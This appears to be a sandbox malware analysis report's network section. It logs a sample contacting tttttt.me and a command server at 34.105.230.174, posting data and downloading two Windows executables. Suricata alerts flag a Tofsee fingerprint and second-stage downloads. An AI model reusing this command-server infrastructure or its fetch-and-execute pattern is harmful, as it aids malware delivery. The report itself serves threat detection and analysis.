Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
tttttt.me | 95.216.186.40 |
- UDP Requests
-
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:56758 239.255.255.250:3702
-
GET
200
https://tttttt.me/h_manchik_1
REQUEST
RESPONSE
BODY
GET /h_manchik_1 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: tttttt.me
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Jun 2021 08:55:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=b3d43e5e9148057a53_4688758286685900677; expires=Thu, 03 Jun 2021 08:55:40 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
Strict-Transport-Security: max-age=35768000
Access-Control-Allow-Origin: *
POST
200
http://34.105.230.174/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: 34.105.230.174
HTTP/1.1 200 OK
server: nginx/1.14.0 (Ubuntu)
date: Wed, 02 Jun 2021 08:55:41 GMT
content-type: text/plain;charset=UTF-8
transfer-encoding: chunked
access-control-allow-headers: *
access-control-allow-origin: *
GET
200
http://34.105.230.174//l/f/GFLvy3kBuI_ccNKogOz6/a280620c863d7ffc3144795ab2accf7dfb84515d
REQUEST
RESPONSE
BODY
GET //l/f/GFLvy3kBuI_ccNKogOz6/a280620c863d7ffc3144795ab2accf7dfb84515d HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 34.105.230.174
HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Wed, 02 Jun 2021 08:55:42 GMT
content-type: application/octet-stream
content-length: 916735
last-modified: Thu, 11 Feb 2021 18:55:17 GMT
etag: "60257d95-dfcff"
accept-ranges: bytes
GET
200
http://34.105.230.174//l/f/GFLvy3kBuI_ccNKogOz6/02fba16e593aeafa8ca627e981f73bd22cefc7a3
REQUEST
RESPONSE
BODY
GET //l/f/GFLvy3kBuI_ccNKogOz6/02fba16e593aeafa8ca627e981f73bd22cefc7a3 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 34.105.230.174
HTTP/1.1 200 OK
server: nginx/1.14.0 (Ubuntu)
date: Wed, 02 Jun 2021 08:55:47 GMT
content-type: application/octet-stream
content-length: 2828315
last-modified: Thu, 11 Feb 2021 18:55:16 GMT
etag: "60257d94-2b281b"
accept-ranges: bytes
POST
200
http://34.105.230.174/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
Content-Length: 1904
Host: 34.105.230.174
HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Wed, 02 Jun 2021 08:55:50 GMT
content-type: text/plain;charset=UTF-8
transfer-encoding: chunked
access-control-allow-headers: *
access-control-allow-origin: *
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49810 -> 95.216.186.40:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 34.105.230.174:80 -> 192.168.56.102:49811 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 34.105.230.174:80 -> 192.168.56.102:49811 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 34.105.230.174:80 -> 192.168.56.102:49811 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49810 95.216.186.40:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=tttttt.me | ff:46:0a:ed:46:1a:92:da:d9:8a:95:d8:4b:c2:3d:51:b8:73:06:13 |
Snort Alerts
No Snort Alerts